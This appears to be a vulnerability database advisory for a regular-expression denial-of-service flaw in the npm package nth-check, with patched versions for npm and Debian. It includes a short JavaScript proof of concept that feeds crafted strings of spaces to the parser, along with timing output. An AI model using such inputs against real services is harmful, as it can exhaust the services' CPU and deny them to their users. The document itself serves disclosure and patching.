Fluid Attacks Database

Description

Inefficient Regular Expression Complexity in nth-check There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.

The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.

Proof of Concept

// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i*10000)+"!";
    try {
        nthCheck.parse(attack_str) 
    }...

The Output

attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem	Package	Affected version	Patched versions
debian 12	node-nth-check	>=0 <2.0.1-1	2.0.1-1
npm	nth-check	>=0 <2.0.1	2.0.1
debian 13	node-nth-check	>=0 <2.0.1-1	2.0.1-1
debian 14	node-nth-check	>=0 <2.0.1-1	2.0.1-1
debian 11	node-nth-check	=2.0.0-1 \|\| >=0 <2.0.0-1+deb11u1	2.0.0-1+deb11u1

Aliases

1. CVE-2021-38032. NVD-2021-38033. OSV-DEBIAN-2021-38034. OSV-2021-38035. GCVE-2021-38036. SECURITY-TRACKER-CVE-2021-38037. lists.debian.org

References

1. https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb7262. https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0